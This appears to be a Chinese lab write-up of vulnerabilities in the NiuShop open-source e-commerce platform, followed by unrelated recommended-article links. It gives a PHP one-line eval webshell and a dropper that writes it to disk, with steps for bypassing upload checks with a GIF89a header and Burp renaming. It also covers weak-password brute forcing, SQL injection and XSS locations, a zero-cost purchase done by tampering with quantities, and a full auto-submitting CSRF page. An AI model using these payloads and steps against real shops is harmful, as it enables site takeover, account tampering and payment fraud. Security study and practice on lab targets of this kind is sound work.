niushop开源商城靶场漏洞

文件上传漏洞

有很多地方都存在文件上传;有的地方是要校验,加一个GIF89a就可以绕过

先注册一个账号

来到个人信息修改个人头像

选择我们的马

复制代码
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

复制代码
#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

sqlmap跑出来的

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为0.00000001

一共修改两次

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

复制代码
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user&#95;name" value="bbbcdff" />
      <input type="hidden" name="real&#95;name" value="11wsdasa" />
      <input type="hidden" name="birthday" value="1970&#45;01&#45;01" />
      <input type="hidden" name="location" value="'onclick&#61;'alert&#40;1&#41;'" />
      <input type="hidden" name="user&#95;qq" value="2461" />
      <input type="hidden" name="act" value="act&#95;edit&#95;profile" />
      <input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

用户在已登录的状态点击我们的链接

相关推荐
安东尼肉店19 分钟前
Android compose屏幕适配终极解决方案
android
2501_9160074734 分钟前
HTTPS 抓包乱码怎么办?原因剖析、排查步骤与实战工具对策(HTTPS 抓包乱码、gzipbrotli、TLS 解密、iOS 抓包)
android·ios·小程序·https·uni-app·iphone·webview
feiyangqingyun2 小时前
基于Qt和FFmpeg的安卓监控模拟器/手机摄像头模拟成onvif和28181设备
android·qt·ffmpeg
用户2018792831676 小时前
ANR之RenderThread不可中断睡眠state=D
android
煤球王子6 小时前
简单学:Android14中的Bluetooth—PBAP下载
android
小趴菜82276 小时前
安卓接入Max广告源
android
齊家治國平天下6 小时前
Android 14 系统 ANR (Application Not Responding) 深度分析与解决指南
android·anr
ZHANG13HAO6 小时前
Android 13.0 Framework 实现应用通知使用权默认开启的技术指南
android
【ql君】qlexcel6 小时前
Android 安卓RIL介绍
android·安卓·ril
写点啥呢6 小时前
android12解决非CarProperty接口深色模式设置后开机无法保持
android·车机·aosp·深色模式·座舱